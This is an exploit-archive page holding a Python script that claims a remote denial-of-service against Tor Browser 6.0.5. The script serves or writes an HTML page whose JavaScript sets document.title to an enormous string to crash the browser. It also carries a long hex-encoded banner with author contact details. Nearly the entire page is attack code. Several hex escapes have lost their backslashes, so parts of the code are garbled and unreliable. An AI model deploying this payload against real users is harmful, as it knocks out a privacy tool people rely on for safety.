Home / exploits Tor Browser 6.0.5 remote Denial of Service
Posted on 30 November -0001
<HTML><HEAD><TITLE>Tor Browser 6.0.5 remote Denial of Service</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>#Exploit Title: Tor Browser 6.0.5 remote Denial of Service #Author: Sultan Albalawi #video:https://www.facebook.com/pentest3/videos/vb.100012552940568/204971129931317/?type=2&theater #Tested on:win7 # external ip http://extrnal-ip:6060 #or torbrowser--> ctrl+o --> choose file--> click_crash from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer import subprocess,string host='192.168.100.3' port=6060 ban= 'x0dx0ax20x20x20x20x20x20x20x5cx20x20x20x2dx20x20' ban+='x2dx20x20x2dx20x3cx73x65x72x76x65x72x3ex20x20x2d' ban+='x20x5cx2dx2dx2dx3cx20x2dx20x2dx20x20x2dx20x2dx20' ban+='x20x2dx20x20x2ax0dx0ax20x20x20x20x20x20x20x20x20' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20' ban+='x20x20x20x20x20x20x20x20x2ax2ax2ax0dx0ax20x20x20' ban+='x20x20x20x20x7cx20x20x20x20x44x6fx63x5fx41x74x74' ban+='x61x63x6bx20x20x20x20x20x20x20x20x20x20x20x20x20' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x2ax2ax2a' ban+='x2ax2ax0dx0ax20x20x20x20x20x20x20x7cx20x20x20x20' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20' ban+='x20x20x20x2ax2ax2ax2ax2ax2ax2ax0dx0ax20x20x20x20' ban+='x20x20x20x76x20x20x20x20x20x20x20x20x60x20x60x2e' ban+='x20x20x20x20x2cx3bx27x20x20x20x20x20x20x20x20x20' ban+='x20x20x20x20x20x20x20x20x20x2ax2ax2ax2ax41x70x50' ban+='x2ax2ax2ax2ax0dx0ax20x20x20x20x20x20x20x20x20x20' ban+='x20x20x20x20x20x20x60x2ex20x20x2cx27x2fx20x2ex27' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20' ban+='x20x20x2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax0d' ban+='x0ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x20' ban+='x20x20x60x2ex20x58x20x2fx2ex27x20x20x20x20x20x20' ban+='x20x20x20x20x20x20x20x2ax20x20x20x20x20x2ax2ax2a' ban+='x2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax0dx0ax20x20x20x20' ban+='x20x20x20x2ex2dx3bx2dx2dx27x27x2dx2dx2ex5fx60x20' ban+='x60x20x28x20x20x20x20x20x20x20x20x20x20x20x20x20' ban+='x20x2ax2ax2ax20x20x20x20x20x20x20x20x20x20x7cx0d' ban+='x0ax20x20x20x20x20x2ex27x20x20x20x20x20x20x20x20' ban+='x20x20x20x2fx20x20x20x20x27x20x20x20x20x20x20x20' ban+='x20x20x20x20x20x2ax2ax2ax2ax2ax20x20x20x20x20x20' ban+='x20x20x20x7cx20x64x61x74x61x62x61x73x65x0dx0ax20' ban+='x20x20x20x20x3bx53x65x63x75x72x69x74x79x60x20x20' ban+='x27x20x30x20x20x30x20x27x20x20x20x20x20x20x20x20' ban+='x20x2ax2ax2ax4ex45x54x2ax2ax2ax20x20x20x20x20x20' ban+='x20x7cx0dx0ax20x20x20x20x2cx20x20x20x20x20x20x20' ban+='x2cx20x20x20x20x27x20x20x7cx20x20x27x20x20x20x20' ban+='x20x20x20x20x20x20x2ax2ax2ax2ax2ax2ax2ax2ax2ax20' ban+='x20x20x20x20x20x20x5ex0dx0ax20x2cx2ex20x7cx20x20' ban+='x20x20x20x20x20x27x20x20x20x20x20x60x2ex5fx2ex27' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x7c' ban+='x2dx2dx2dx2dx2dx2dx2dx5ex2dx2dx2dx5ex20x20x20x20' ban+='x20x20x20x20x20x20x2fx0dx0ax20x3ax20x20x2ex20x60' ban+='x20x20x3bx20x20x20x60x20x20x60x20x2dx2dx2cx2ex2e' ban+='x5fx3bx2dx2dx2dx3ex20x20x20x20x20x20x20x20x20x7c' ban+='x20x20x20x20x20x20x20x27x2ex27x2ex27x5fx5fx5fx5f' ban+='x5fx5fx5fx5fx20x2ax0dx0ax20x20x27x20x60x20x20x20' ban+='x20x2cx20x20x20x29x20x20x20x2ex27x20x20x20x20x20' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x5ex20' ban+='x20x20x20x20x20x20x20x7cx5fx7cx20x46x69x72x65x77' ban+='x61x6cx6cx20x29x0dx0ax20x20x20x20x20x60x2ex5fx20' ban+='x2cx20x20x27x20x20x20x2fx5fx20x20x20x20x20x20x20' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x7cx20x20' ban+='x20x20x20x20x20x20x20x20x20x20x7cx7cx20x20x20x20' ban+='x7cx7cx0dx0ax20x20x20x20x20x20x20x20x3bx20x2cx27' ban+='x27x2dx2cx3bx27x20x60x60x2dx5fx5fx5fx5fx5fx5fx5f' ban+='x5fx5fx5fx5fx5fx5fx5fx5fx5fx5fx7cx0dx0ax20x20x20' ban+='x20x20x20x20x20x20x60x60x2dx2ex2ex5fx5fx60x60x2d' ban+='x2dx60x20x20x20x20x20x20x20x69x70x73x20x20x20x20' ban+='x20x20x20x2dx20x20x20x20x20x20x20x20x20x20x20x5e' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x2fx0dx0ax20' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20' ban+='x20x20x20x20x20x20x2dx20x20x20x20x20x20x20x20x27' ban+='x2ex20x5fx2dx2dx2dx2dx2dx2dx2dx2dx2dx2ax0dx0ax20' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20' ban+='x20x20x20x20x20x20x20x2dx5fx5fx5fx5fx5fx5fx5fx20' ban+='x7cx5fx20x20x49x50x53x20x20x20x20x20x29x0dx0ax20' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20' ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20' ban+='x20x20x20x20x7cx7cx20x20x20x20x20x7cx7cx0dx0ax20' ban+=' ' ban+='x53x75x6cx74x61x6ex5fx41x6cx62x61x6cx61x77x69 ' ban+='x68x74x74x70x73x3ax2fx2fx77x77x77x2ex66x61x63x65x62x6fx6fx6bx2ex63x6fx6dx2fx70x65x6ex74x65x73x74x33 ' ban+="x61x6cx62x61x6cx61x77x69x34x70x65x6ex74x65x73x74x40x67x6dx61x69x6cx2ex63x6fx6d" print ban print "please wait ...." htmlcrach=('''<html> <head> <title>Tor Browser 6.0.5 Crash (poc)</title> </br> <h1>Tor Browser 6.0.5 Crash (poc) <h1> <h1>x41x75x74x68x6fx72x3ax20x53x75x6cx74x61x6ex2dx61x6cx62x61x6cx61x77x69<h1> <h1>x68x74x74x70x73x3ax2fx2fx77x77x77x2ex66x61x63x65x62x6fx6fx6bx2ex63x6fx6dx2fx70x65x6ex74x65x73x74x33 <h1> </div> <script type="text/javascript"> function ex() { var buf = ""; for (var i = 0; i <x35x30x30x30x30; i++) { buf += "x41"; } var buff = buf; for (i = 0; i <x35x30x30x30; i++) { buff += buf; } document.title = buff; } </script></head><body><a href="javascript:ex();">Click_Crash </a></body></html>''') i=1 while i <= 20: i+=1 ban+=string.ascii_uppercase*250 ban=ban class Req(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-type','text/html') self.end_headers() self.wfile.write(htmlcrach) class runHTTP(HTTPServer): def __init__(self,host,port): ipadd=(host,port) HTTPServer.__init__(self,ipadd,Req) def createfile(): global filecreate filecreate = "TorCrash.html" open(filecreate, "wb").write(htmlcrach) print ('file done: {}').format(filecreate) def start(): global filecreate ser=runHTTP(host,port) print "http://{}:{}/{}".format(host,port,filecreate) ser.serve_forever() createfile() start()</BODY></HTML>